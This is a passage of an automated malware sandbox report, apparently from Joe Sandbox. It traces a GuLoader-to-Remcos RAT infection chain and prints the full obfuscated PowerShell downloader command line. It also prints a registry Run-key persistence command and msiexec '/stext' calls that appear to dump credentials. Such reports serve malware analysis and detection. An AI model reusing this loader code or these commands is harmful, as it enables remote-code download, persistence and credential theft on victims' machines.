ra3Cod 1 Hdr.Fo r0Etym ';$Signatarmagters=Dark ' reu FyrsBivoe PosRIle - alASneaG WayeIsodN J mTGe e ';$beskftigelsesinteressen=Dark 'Hre hS petTraft nkp Ka,sLoai:Inex/ Co /DowneConivYn leUndesIntaeVerdc TmrrCaroeOlivtPrin.M,timGou aCyl /LokaM,adeigarasRecefAutoo ylbrForlsL.rat,orpa Pina Po e.egil Slfs WifeKbenr RetnReckeRejs. Autp,heesGroum,itr ';$Unacute27mpastoed=Dark 'Volu> Nyt ';$Dolomitternes=Dark 'archiConsEForbX Skr ';$nyhedsbureauernes='Forfatningsdomstol';$Cynography='\Satisfiable.Ins';Nondeclaratively (Dark 'Hort$AmphgSyrilLa gOBo abVaa ASh nL Und:VellsFdsekTestiMassLBys.s We,mSterIStilsstokSHan eSt erGuld1reva8 Rov=Rumi$ FleeGiarNUnsuvCons: efeAT rbPMicrPH lkDSpriAAntiTForsAColi+Unfo$Ges.CFo.lYKam NSta OOp,jgFallR BriA .enpTrasHBarkyHyae ');Nondeclaratively (Dark ' ,ns$LavtgMonsL VinoCharB c aaCatcL D,n:sc,pKSambl regAL ngR ympLSpriAPsy GImmotba.keHortSGdni= par$SavsbMicreDiscSBrackMel FPyr TTilbI,oncGBe oe TimlEnchsBuckEBrneSExosIGaseN,aklTBlgee Ranr R,seChroSUnpesRek,e Eu NDise. DaySFolkpRedelIn biPuckTMed (Rage$PicaUMetaNClamAUdstCPastuA teTAeroE kse2 er7Gt,eMLa,dp.tagAVaans ikoTBarbOPulsEUngrdSamf)Himm ');Nondeclaratively (Dark $Unpliantness);$beskftigelsesinteressen=$Klarlagtes[0];$Kakar=(Dark 'tr.i$Tut g DenlR.adOVrdibCru aWordLs.de:.pkaGSkadROve,uOronnArkidEft V edgOOpfaL.rendFdesE ,roN OmgsPutr= BedNSlamED mpW rad-vapooFeatB IntjP liEKa,scRemstHumi FodbS hiy Ad,SSurrTS.ioESkosmTils. aefNOpbyEWhartLykk. RebW A.se AlbbCommcF rlLAn,eISla,ESam N PieTSeku ');Nondeclaratively ($Kakar);Nondeclaratively (Dark 'Brav$SummGSyger buluVitan Xerd danvCangoStamlK utdSip eTurinKi ts Ov,.EmblH BeceNdtvaAr,mdFlleeKultrCitrs ek [Pape$ TroS LeeiFrkhg F,bnH,gba P.ethypea Figr Rabm para njegByu,t ynkeInshr Stes Tab] Ken=Per,$m.noSMackkMe.irPh,rlNianl F.seSi ndFucae Bab ');$Spectatorial=Dark 'Rese$ArtoGAborr awcu R gnHaradt onvVr ioPro l Pu dBugbeDodgnBesesAske.Eb eDklago FonwOs enAfskludgaoThela TridForeFNonciWorklPri,eSp j(Pr i$Gai b.ubieIntrs SockNicofLucitKnuriti,dgKapieKu slmta s ProeFeebs ForiPat.nRougtVurdeFlusrOvereKad sIndtsAforeTil,nFjen,Alkv$ LamN,agea F laBuzzdDemal StveAflerEks 1 Inh7Scr )Juma ';$Naadler17=$Skilsmisser18;Nondeclaratively (Dark ' ost$StudgUdgilFjerOPadlb.luma Hi.L Tan:AngoNRompRCousLNo wsSalgtZo,eEStra=Nonf(Picct ,egePelisG nntKval-B unPKo mABlintBalaH Dis Dek$Te tN DecAMe aaPa aDA.sal.yzye.orvr,nsv1Styr7 P,n)Thir ');while (!$Nrlste) {Nondeclaratively (Dark 'Mul $AnskgGruplDjvloAtt bT ana ruslAff :NormO ycob FaljD,ffeTrowkBj.ntVilieSupetHome=Disc$ KumtTe drLideu Ande Amo ') ;Nondeclaratively $Spectatorial;Nondeclaratively (Dark 'Ani SOutktS gnaFlunRRepoTUnra-ZappsunfrLTeleeI,coeBiblpFu h Abes4Unse ');Nondeclaratively (Dark 'Indd$TgthG f slReupOGl,bbDecoA.lanLRe,u:AnhnnVarermimuL ligsRe ytunfoEFraf= K b(Ca.otStvkEneursGar.tM rm-UskrpKetuAOxyttAlgohMajo Tvr$PoweNP.daaPre aGenndHenvlNarkEPe srMorm1Udsk7Wago)Skri ') ;Nondeclaratively (Dark ' ort$StangAcqul alaOWindbRetiaMi nLRep,: ChrEIlsotIntetInstAKon,r arrRU inESti,=With$Amo GbybeLBadeoUncabByggaMar LAdum:eve,sFlleTAtr,o.inoRRagtMTorkAStopGMuleaTaylshundI F gn UntEFa tRBlges irc+ lea+Filo%inf $ ntK lvrLCordA Udmr SeallineaC ntGVvemt M.leOstes Mon.BetrcV.jfoTreduF denPrejTCirk ') ;$beskftigelsesinteressen=$Klarlagtes[$Ettarre];}$Allergists=311693;$Tugtelsen16=29701;Nondeclaratively (Dark 'Uncu$WombgTaliLMusiOAfstbOb uAInteL Bil:AnthkNeceOFiskm BamMNedkOAn ndBa oEParaR,egenP.lye FriSInse Sper=Fej TrimGCic,e OveT tig-DiplCSprjOTovaNEleptFugleDetaNstaktmars D,ct$fantnI.teACapsaMetaDKamul,ulteSamar Wit1Swim7Erin ');Nondeclaratively (Dark 'Iris$S,ndgAfdml cocoPer bci naFoldl Inf:ShufK BezuAffasOp kkFrice VotsPostl C.iaKustgInv s r=Meso Syne[Vi oS ney,ellsBadet MiceAf.imJamb.MoraC DisoLgedn scuvTromeA lerSulftUn a]Cu i:Kain:FlavFBryorMnstoagnumInkaBProtaTransHamseSlag6 Spa4 PseS T.etGener UniiLandn R ggLinj( cle$Ba cK ordoJubimTri mTrufoAabndNedbeSaltrSinanMarkeStils ar).yto ');Nondeclaratively (Dark 'vesi$GsteGblealRadio Pe.B Ka,AIndblInf,:TusiAListg Mu,ESpumrEurojUnscO emir UnrDwanneBotaN Rev Dead=Hare ri [ askS MenYkodfsConct PoteO.acMZorn. Reft KomEBo.gXFo etRefr.MassE ButNTidscD scoPrecd H.siP,rsNMallg,odh]Bet.: S,b:PrevA ntis PunCAfsviForfI Var.KamnGHalvEarchT algSrednt Tr RSamnIF shNMoungM,cr(Kamp$FedtkStakuBrussMoniKTe pENonasDithLP piAHypeG Bel)Afho ');Nondeclaratively (Dark ' Udp$T nngA knLav so ,udBTan aRa gLSuff: FeatpseueEthyu ArbTTr toPlatN Auti Buez adlE Sko=yder$Sun a elGOp fe VejR NapJ KonOCobur PyrdMa tePop N ,eo.Co,nsSullu acBM,kss T gt ayoRAmmiI erNMissGSove(resk$ThirA SabL PaelSkobeBrnerR stG onsiReams ThetFlaksSpid,Jamb$Fag tP esU VenG FulTOmprE ProLS uiSSkanE HonNGeni1 Ans6Pava)Cab, ');Nondeclaratively $Teutonize;"
                                                                                                          Imagebase:0x7ff6e3d50000
                                                                                                          File size:452'608 bytes
                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2286084235.0000014F9006F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:4
                                                                                                          Start time:04:22:01
                                                                                                          Start date:28/10/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff66e660000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:5
                                                                                                          Start time:04:22:10
                                                                                                          Start date:28/10/2024
                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Paremernes duplicature Udvejer Dataservicens Treasury Ostleress Uninterdicted #>;$Cryoscopy='Grusgrav';<#Dubbe Bantustamme Nyvurderende Tripudiate Mitigated #>; function Dark($Misligholdelsers){If ($host.DebuggerEnabled) {$Differentieringens++;}$Sadomasochism=$Cariss+$Misligholdelsers.'Length'-$Differentieringens; for( $Unacute27=4;$Unacute27 -lt $Sadomasochism;$Unacute27+=5){$Unaccommodable=$Unacute27;$Enforth+=$Misligholdelsers[$Unacute27];$Cutireaction='Blomstringstiderne';}$Enforth;}function Nondeclaratively($Budcyklen){ . ($Dolomitternes) ($Budcyklen);}$Skrllede=Dark 'StaiMC clo eftzF stiRagelRi elStyra ogn/Thra ';$Stupiditetens=Dark 'KrypTSvenl PresU ne1 nde2unav ';$Unpliantness=' lus[MashNFldee My T Fal.AnthsD coehistrru dVS stIEngrCBefaeTilgPTortO BogiSangNOpspTMa.iMNonfA awnNSkruASamlgLibeEZygoR lit]Vaga:Sovj:AlecSMyogECuphcP esUGennRDisci C aTSkjuy BasP iggRV.rgo Ga tGonioCam.c.eclOTrevlSvrm= Ven$Net sEndeTconcu.seuptomaiRoveDGoveIFagkT UnmE TraTGastEFravn R.ms Unp ';$Skrllede+=Dark 'Regi5Majo.Mau.0 Opd Simo(Tip WTer iF lgnChrodBusho Priw .orsUnsh j,nsN MolTBuff Fora1Side0Fod ..ast0Ni n;Vilj AnfgW KreieftenMaka6Svir4Unpr;Str, ParxLine6 Uns4.nde;beru beedrAfkavGoat:Gene1 Un 3Sang1 up.Miss0fo m) Mor AandGDiskeRee cturbkMorpo dta/Nive2 Res0Drop1slad0Skuf0Arch1K,nd0.dst1 Ri tetFAeroi ConrStofe ,lifEnteo ,dkxTreu/A,te1V ra3Cod 1 Hdr.Fo r0Etym ';$Signatarmagters=Dark ' reu FyrsBivoe PosRIle - alASneaG WayeIsodN J mTGe e ';$beskftigelsesinteressen=Dark 'Hre hS petTraft nkp Ka,sLoai:Inex/ Co /DowneConivYn leUndesIntaeVerdc TmrrCaroeOlivtPrin.M,timGou aCyl /LokaM,adeigarasRecefAutoo ylbrForlsL.rat,orpa Pina Po e.egil Slfs WifeKbenr RetnReckeRejs. Autp,heesGroum,itr ';$Unacute27mpastoed=Dark 'Volu> Nyt ';$Dolomitternes=Dark 'archiConsEForbX Skr ';$nyhedsbureauernes='Forfatningsdomstol';$Cynography='\Satisfiable.Ins';Nondeclaratively (Dark 'Hort$AmphgSyrilLa gOBo abVaa ASh nL Und:VellsFdsekTestiMassLBys.s We,mSterIStilsstokSHan eSt erGuld1reva8 Rov=Rumi$ FleeGiarNUnsuvCons: efeAT rbPMicrPH lkDSpriAAntiTForsAColi+Unfo$Ges.CFo.lYKam NSta OOp,jgFallR BriA .enpTrasHBarkyHyae ');Nondeclaratively (Dark ' ,ns$LavtgMonsL VinoCharB c aaCatcL D,n:sc,pKSambl regAL ngR ympLSpriAPsy GImmotba.keHortSGdni= par$SavsbMicreDiscSBrackMel FPyr TTilbI,oncGBe oe TimlEnchsBuckEBrneSExosIGaseN,aklTBlgee Ranr R,seChroSUnpesRek,e Eu NDise. DaySFolkpRedelIn biPuckTMed (Rage$PicaUMetaNClamAUdstCPastuA teTAeroE kse2 er7Gt,eMLa,dp.tagAVaans ikoTBarbOPulsEUngrdSamf)Himm ');Nondeclaratively (Dark $Unpliantness);$beskftigelsesinteressen=$Klarlagtes[0];$Kakar=(Dark 'tr.i$Tut g DenlR.adOVrdibCru aWordLs.de:.pkaGSkadROve,uOronnArkidEft V edgOOpfaL.rendFdesE ,roN OmgsPutr= BedNSlamED mpW rad-vapooFeatB IntjP liEKa,scRemstHumi FodbS hiy Ad,SSurrTS.ioESkosmTils. aefNOpbyEWhartLykk. RebW A.se AlbbCommcF rlLAn,eISla,ESam N PieTSeku ');Nondeclaratively ($Kakar);Nondeclaratively (Dark 'Brav$SummGSyger buluVitan Xerd danvCangoStamlK utdSip eTurinKi ts Ov,.EmblH BeceNdtvaAr,mdFlleeKultrCitrs ek [Pape$ TroS LeeiFrkhg F,bnH,gba P.ethypea Figr Rabm para njegByu,t ynkeInshr Stes Tab] Ken=Per,$m.noSMackkMe.irPh,rlNianl F.seSi ndFucae Bab ');$Spectatorial=Dark 'Rese$ArtoGAborr awcu R gnHaradt onvVr ioPro l Pu dBugbeDodgnBesesAske.Eb eDklago FonwOs enAfskludgaoThela TridForeFNonciWorklPri,eSp j(Pr i$Gai b.ubieIntrs SockNicofLucitKnuriti,dgKapieKu slmta s ProeFeebs ForiPat.nRougtVurdeFlusrOvereKad sIndtsAforeTil,nFjen,Alkv$ LamN,agea F laBuzzdDemal StveAflerEks 1 Inh7Scr )Juma ';$Naadler17=$Skilsmisser18;Nondeclaratively (Dark ' ost$StudgUdgilFjerOPadlb.luma Hi.L Tan:AngoNRompRCousLNo wsSalgtZo,eEStra=Nonf(Picct ,egePelisG nntKval-B unPKo mABlintBalaH Dis Dek$Te tN DecAMe aaPa aDA.sal.yzye.orvr,nsv1Styr7 P,n)Thir ');while (!$Nrlste) {Nondeclaratively (Dark 'Mul $AnskgGruplDjvloAtt bT ana ruslAff :NormO ycob FaljD,ffeTrowkBj.ntVilieSupetHome=Disc$ KumtTe drLideu Ande Amo ') ;Nondeclaratively $Spectatorial;Nondeclaratively (Dark 'Ani SOutktS gnaFlunRRepoTUnra-ZappsunfrLTeleeI,coeBiblpFu h Abes4Unse ');Nondeclaratively (Dark 'Indd$TgthG f slReupOGl,bbDecoA.lanLRe,u:AnhnnVarermimuL ligsRe ytunfoEFraf= K b(Ca.otStvkEneursGar.tM rm-UskrpKetuAOxyttAlgohMajo Tvr$PoweNP.daaPre aGenndHenvlNarkEPe srMorm1Udsk7Wago)Skri ') ;Nondeclaratively (Dark ' ort$StangAcqul alaOWindbRetiaMi nLRep,: ChrEIlsotIntetInstAKon,r arrRU inESti,=With$Amo GbybeLBadeoUncabByggaMar LAdum:eve,sFlleTAtr,o.inoRRagtMTorkAStopGMuleaTaylshundI F gn UntEFa tRBlges irc+ lea+Filo%inf $ ntK lvrLCordA Udmr SeallineaC ntGVvemt M.leOstes Mon.BetrcV.jfoTreduF denPrejTCirk ') ;$beskftigelsesinteressen=$Klarlagtes[$Ettarre];}$Allergists=311693;$Tugtelsen16=29701;Nondeclaratively (Dark 'Uncu$WombgTaliLMusiOAfstbOb uAInteL Bil:AnthkNeceOFiskm BamMNedkOAn ndBa oEParaR,egenP.lye FriSInse Sper=Fej TrimGCic,e OveT tig-DiplCSprjOTovaNEleptFugleDetaNstaktmars D,ct$fantnI.teACapsaMetaDKamul,ulteSamar Wit1Swim7Erin ');Nondeclaratively (Dark 'Iris$S,ndgAfdml cocoPer bci naFoldl Inf:ShufK BezuAffasOp kkFrice VotsPostl C.iaKustgInv s r=Meso Syne[Vi oS ney,ellsBadet MiceAf.imJamb.MoraC DisoLgedn scuvTromeA lerSulftUn a]Cu i:Kain:FlavFBryorMnstoagnumInkaBProtaTransHamseSlag6 Spa4 PseS T.etGener UniiLandn R ggLinj( cle$Ba cK ordoJubimTri mTrufoAabndNedbeSaltrSinanMarkeStils ar).yto ');Nondeclaratively (Dark 'vesi$GsteGblealRadio Pe.B Ka,AIndblInf,:TusiAListg Mu,ESpumrEurojUnscO emir UnrDwanneBotaN Rev Dead=Hare ri [ askS MenYkodfsConct PoteO.acMZorn. Reft KomEBo.gXFo etRefr.MassE ButNTidscD scoPrecd H.siP,rsNMallg,odh]Bet.: S,b:PrevA ntis PunCAfsviForfI Var.KamnGHalvEarchT algSrednt Tr RSamnIF shNMoungM,cr(Kamp$FedtkStakuBrussMoniKTe pENonasDithLP piAHypeG Bel)Afho ');Nondeclaratively (Dark ' Udp$T nngA knLav so ,udBTan aRa gLSuff: FeatpseueEthyu ArbTTr toPlatN Auti Buez adlE Sko=yder$Sun a elGOp fe VejR NapJ KonOCobur PyrdMa tePop N ,eo.Co,nsSullu acBM,kss T gt ayoRAmmiI erNMissGSove(resk$ThirA SabL PaelSkobeBrnerR stG onsiReams ThetFlaksSpid,Jamb$Fag tP esU VenG FulTOmprE ProLS uiSSkanE HonNGeni1 Ans6Pava)Cab, ');Nondeclaratively $Teutonize;"
                                                                                                          Imagebase:0x900000
                                                                                                          File size:433'152 bytes
                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2444032858.0000000008C20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2444276578.000000000941D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2430167631.0000000005E7A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:6
                                                                                                          Start time:04:22:10
                                                                                                          Start date:28/10/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff66e660000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:10
                                                                                                          Start time:04:22:28
                                                                                                          Start date:28/10/2024
                                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                          Imagebase:0x350000
                                                                                                          File size:59'904 bytes
                                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000003.2724664093.00000000088D4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000003.2704808533.00000000088D4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:high
                                                                                                          Has exited:false

                                                                                                          Target ID:12
                                                                                                          Start time:04:22:33
                                                                                                          Start date:28/10/2024
                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udstiller35" /t REG_EXPAND_SZ /d "%Atlantad% -windowstyle 1 $Dogship=(gp -Path 'HKCU:\Software\Badder\').Trigonocephaly;%Atlantad% ($Dogship)"
                                                                                                          Imagebase:0x1c0000
                                                                                                          File size:236'544 bytes
                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:13
                                                                                                          Start time:04:22:33
                                                                                                          Start date:28/10/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff66e660000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:14
                                                                                                          Start time:04:22:34
                                                                                                          Start date:28/10/2024
                                                                                                          Path:C:\Windows\SysWOW64\reg.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udstiller35" /t REG_EXPAND_SZ /d "%Atlantad% -windowstyle 1 $Dogship=(gp -Path 'HKCU:\Software\Badder\').Trigonocephaly;%Atlantad% ($Dogship)"
                                                                                                          Imagebase:0x6d0000
                                                                                                          File size:59'392 bytes
                                                                                                          MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:15
                                                                                                          Start time:04:22:59
                                                                                                          Start date:28/10/2024
                                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale"
                                                                                                          Imagebase:0x350000
                                                                                                          File size:59'904 bytes
                                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:16
                                                                                                          Start time:04:22:59
                                                                                                          Start date:28/10/2024
                                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale"
                                                                                                          Imagebase:0x350000
                                                                                                          File size:59'904 bytes
                                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:17
                                                                                                          Start time:04:22:59
                                                                                                          Start date:28/10/2024
                                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale"
                                                                                                          Imagebase:0x350000
                                                                                                          File size:59'904 bytes
                                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:18
                                                                                                          Start time:04:22:59
                                                                                                          Start date:28/10/2024
                                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale"
                                                                                                          Imagebase:0x350000
                                                                                                          File size:59'904 bytes
                                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:19
                                                                                                          Start time:04:22:59
                                                                                                          Start date:28/10/2024
                                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qyucuggstgpeoollwrdamgokovwgtwvpgi"
                                                                                                          Imagebase:0x350000
                                                                                                          File size:59'904 bytes
                                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:20
                                                                                                          Start time:04:23:00
                                                                                                          Start date:28/10/2024
                                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\sahvvz"
                                                                                                          Imagebase:0x350000
                                                                                                          File size:59'904 bytes
                                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Reset < >
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2299486572.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_7ffd34870000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6435d28fa27b3c6e2d5c5aae371682ad790d8fe8a9dfdad663fd64e9a2dfbded
                                                                                                            • Instruction ID: 5292308b6dbdc90f0166a6c26d72e54aecae0dc6777a586d9b201ca03614ca8e
                                                                                                            • Opcode Fuzzy Hash: 6435d28fa27b3c6e2d5c5aae371682ad790d8fe8a9dfdad663fd64e9a2dfbded
                                                                                                            • Instruction Fuzzy Hash: 92F1C322A0EBC50FE7969B6848B52A57FE1EF57210F0940FFD18CCB193DA19AC49D352
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2299025360.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_7ffd347a0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 07a616bdd03c94c61d83832869a9dfcc25fbedd0d09a9a834376d1f5ef47d07e
                                                                                                            • Instruction ID: 3f43b1dea8807c301952dba3e0a5b4d8a58e9d63fc7a18f710ebc06c53e945bc
                                                                                                            • Opcode Fuzzy Hash: 07a616bdd03c94c61d83832869a9dfcc25fbedd0d09a9a834376d1f5ef47d07e
                                                                                                            • Instruction Fuzzy Hash: 13F1B570A0DA8E8FEBA8DF28C8557E977D1FF55310F04426EE84DC7291DB38A9458B81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2299025360.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_7ffd347a0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f102104b320f71fb6241a115e4db91b1432a6eea1b9f6370f6b8887643c3b887
                                                                                                            • Instruction ID: 008a2b25f182b1284f4d40cb778b49cabb98651871d1b5a43295181b18cf16c1
                                                                                                            • Opcode Fuzzy Hash: f102104b320f71fb6241a115e4db91b1432a6eea1b9f6370f6b8887643c3b887
                                                                                                            • Instruction Fuzzy Hash: A8E1C670A19A4E8FEBA8DF28C8657E977D1FF55310F04426ED84DC7291CE78A94487C1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2299025360.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_7ffd347a0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: vK_^
                                                                                                            • API String ID: 0-2721021717
                                                                                                            • Opcode ID: 79e2596a45e5063b03ae860fa4f74eafebe9ee7a09e28fd09c3ff4d943fdf3d6
                                                                                                            • Instruction ID: f6454964c0360e2b77193ebdff726fc98e8108c1f64a21e63ed3f6d2702fa89c
                                                                                                            • Opcode Fuzzy Hash: 79e2596a45e5063b03ae860fa4f74eafebe9ee7a09e28fd09c3ff4d943fdf3d6
                                                                                                            • Instruction Fuzzy Hash: 0C42A271A18A098FDB98EF5CD4A5AED77E2FF99314F14017AD409D7296CA34B881CBC0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2299486572.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_7ffd34870000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: >_H
                                                                                                            • API String ID: 0-1083064789
                                                                                                            • Opcode ID: f95eb416bf39f89ac7ed2e818c851089832c48f79dc342c8da2d6a9a54dc83d2
                                                                                                            • Instruction ID: 3a922855c6139dcff384ec8b48e37212e7b38c9c00f17908b956f8ab9bfbfdab
